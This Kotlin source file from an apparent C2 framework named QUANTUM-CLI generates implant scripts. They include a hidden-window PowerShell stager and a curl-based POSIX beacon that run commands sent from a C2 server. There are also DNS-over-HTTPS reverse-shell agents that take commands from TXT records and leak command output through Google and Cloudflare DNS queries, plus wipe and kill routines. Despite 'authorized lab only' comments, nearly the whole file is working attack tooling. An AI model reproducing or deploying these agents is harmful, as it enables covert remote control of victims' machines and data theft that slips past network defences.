package com.projectzerodays.quantumcli.c2

/**
 * Agent script serving — OBSIDIAN (PowerShell stager), GHOSTFANG (POSIX curl
 * agent) and GHOSTFANG-DNS (DoH egress agent). GET /s/<profile> hands these
 * to implants, byte-for-byte parity with the Python C2 agents.
 */
object Agents {

    /** OBSIDIAN stager — Windows PowerShell heartbeat/tasking loop. */
    fun obsidianPs1(c2: String): String = """
# OBSIDIAN stager (generated by QUANTUM-CLI V3.1 android)
${'$'}ErrorActionPreference = 'SilentlyContinue'
${'$'}u = 'http://$c2/r'
${'$'}h = ${'$'}env:COMPUTERNAME
while (${'$'}true) {
  ${'$'}b = @{ host = ${'$'}h; act = 'hb'; ts = Get-Date -Format o } | ConvertTo-Json -Compress
  try {
    ${'$'}r = Invoke-RestMethod -Uri ${'$'}u -Method Post -Body ${'$'}b -ContentType 'application/json' -TimeoutSec 10
    if (${'$'}r.cmd) { Start-Process powershell -ArgumentList "-w hidden -c", ${'$'}r.cmd -WindowStyle Hidden }
  } catch {}
  Start-Sleep -Seconds 60
}
""".trimIndent() + "\n"

    /** GHOSTFANG — POSIX beacon agent (curl -> C2 /r, task exec). */
    fun ghostfangSh(c2: String): String = """
#!/bin/sh
# GHOSTFANG agent (generated by QUANTUM-CLI android) — authorized lab only
H=$(hostname 2>/dev/null || echo posix-$(id -u))
while :; do
  R=$(curl -s -m 10 -X POST http://$c2/r \
       -H 'Content-Type: application/json' \
       -d "{\"host\":\"${'$'}H\",\"act\":\"hb\"}" 2>/dev/null)
  C=$(echo "${'$'}R" | sed -n 's/.*"cmd":"\([^"]*\)".*/\1/p')
  [ -n "${'$'}C" ] && (sh -c "${'$'}C" >/dev/null 2>&1 &)
  sleep 60
done
""".trimIndent() + "\n"

    /** GHOSTFANG-DNS — DoH-egress agent (no inbound ports needed). */
    fun ghostdnsSh(domain: String, interval: Int = 60): String = """
#!/bin/sh
# GHOSTFANG-DNS — DoH-egress agent (no inbound ports needed)
QD="$domain"
HOST="$(hostname 2>/dev/null || echo dns-$(id -u))"
ID=$(echo -n "${'$'}HOST" | head -c 12 | tr -c 'a-z0-9' 'x')
beacon() {
  curl -s -m 10 -H 'accept: application/dns-json' \
    "https://cloudflare-dns.com/dns-query?name=${'$'}ID.${'$'}QD&type=A" >/dev/null 2>&1 ||
  curl -s -m 10 "https://dns.google/resolve?name=${'$'}ID.${'$'}QD&type=A" >/dev/null 2>&1
}
task() {
  curl -s -m 10 "https://dns.google/resolve?name=cmd.${'$'}QD&type=TXT" 2>/dev/null |
    grep -o '"data":"[^"]*"' | head -1 | cut -d'"' -f4
}
while :; do
  beacon
  T=$(task | tr -d '"' | tr -d '\\')
  case "${'$'}T" in
    *'"'*'}'*) C=$(echo "${'$'}T" | sed -n 's/.*"cmd":"\([^"]*\)".*/\1/p'); [ -n "${'$'}C" ] && (sh -c "${'$'}C" >/dev/null 2>&1 &) ;;
    wipe) rm -f /var/tmp/.gn-* ~/.qcli* ;; kill) rm -f /var/tmp/.gn-*; kill ${'$'}${'$'} ;;
  esac
  sleep $interval
done
""".trimIndent() + "\n"

    /**
     * Profile registry parity:
     *   default / win / windows / obsidian -> OBSIDIAN ps1
     *   linux / mac / posix / ghostfang     -> GHOSTFANG sh
     *   dns / ghostdns                       -> GHOSTFANG-DNS sh
     */
    fun profile(
        name: String,
        c2HostPort: String,
        dnsDomain: String = "qcli.local"
    ): Pair<String, String>? {
        val key = name.trim().lowercase()
        return when (key) {
            "", "default", "win", "windows", "obsidian", "lakitu" ->
                "obsidian.ps1" to obsidianPs1(c2HostPort)

            "linux", "mac", "posix", "ghostfang", "posixagent" ->
                "ghostfang.sh" to ghostfangSh(c2HostPort)

            "dns", "ghostdns" ->
                "ghostdns.sh" to ghostdnsSh(dnsDomain)

            else -> null
        }
    }

    /** GET /api/dohshell/agent/posix — POSIX DoH reverse-shell agent script. */
    fun dohPosix(): String = """
#!/bin/sh
# DoH reverse-shell agent (POSIX) — authorized lab only
DOMAIN="${'$'}{DOMAIN:-qcli.local}"
ID="$(hostname 2>/dev/null || echo doh-$(id -u))-$(head -c4 /dev/urandom | od -An -tx1 | tr -d ' \n')"
fetch() {
  curl -s -m 10 "https://dns.google/resolve?name=${'$'}1.${'$'}DOMAIN&type=TXT" 2>/dev/null |
    grep -o '"data":"[^"]*"' | head -1 | cut -d'"' -f4
}
beacon() {
  curl -s -m 10 "https://cloudflare-dns.com/dns-query?name=${'$'}ID.${'$'}DOMAIN&type=A" >/dev/null 2>&1 ||
  curl -s -m 10 "https://dns.google/resolve?name=${'$'}ID.${'$'}DOMAIN&type=A" >/dev/null 2>&1
}
while :; do
  beacon
  T=$(fetch cmd)
  C=$(echo "${'$'}T" | sed -n 's/.*"cmd":"\([^"]*\)".*/\1/p')
  if [ -n "${'$'}C" ]; then
    R=$(sh -c "${'$'}C" 2>&1 | head -c 180 | tr -d '\n')
    curl -s -m 10 "https://dns.google/resolve?name=$(echo "${'$'}R" | head -c 60 | tr -c 'a-z0-9' 'x').${'$'}DOMAIN&type=A" >/dev/null 2>&1
  fi
  sleep 45
done
""".trimIndent() + "\n"

    /** GET /api/dohshell/agent/windows — Windows DoH reverse-shell agent (PowerShell). */
    fun dohWindows(): String = """
# DoH reverse-shell agent (Windows PowerShell) — authorized lab only
${'$'}Domain = if (${'$'}env:DOH_DOMAIN) { ${'$'}env:DOH_DOMAIN } else { 'qcli.local' }
${'$'}Id = "${'$'}env:COMPUTERNAME-" + (-join ((48..57) + (97..122) | Get-Random -Count 4 | % { [char]${'$'}_ }))
${'$'}Doh = 'https://dns.google/resolve'
while (${'$'}true) {
  try {
    Invoke-RestMethod -Uri "${'$'}Doh?name=${'$'}Id.${'$'}Domain&type=A" -TimeoutSec 10 | Out-Null
    ${'$'}r = Invoke-RestMethod -Uri "${'$'}Doh?name=cmd.${'$'}Domain&type=TXT" -TimeoutSec 10
    ${'$'}t = (${'$'}r.Answer | Where-Object { ${'$'}_.type -eq 16 } | Select-Object -First 1).data
    if (${'$'}t -match '"cmd":"([^"]*)"') {
      ${'$'}out = (Invoke-Expression ${'$'}Matches[1] 2>&1 | Out-String).Trim() -replace '[^a-zA-Z0-9]', ''
      if (${'$'}out.Length -gt 0) {
        Invoke-RestMethod -Uri "${'$'}Doh?name=${'$'}out.Substring(0, [Math]::Min(60, ${'$'}out.Length)).${'$'}Domain&type=A" -TimeoutSec 10 | Out-Null
      }
    }
  } catch {}
  Start-Sleep -Seconds 45
}
""".trimIndent() + "\n"
}
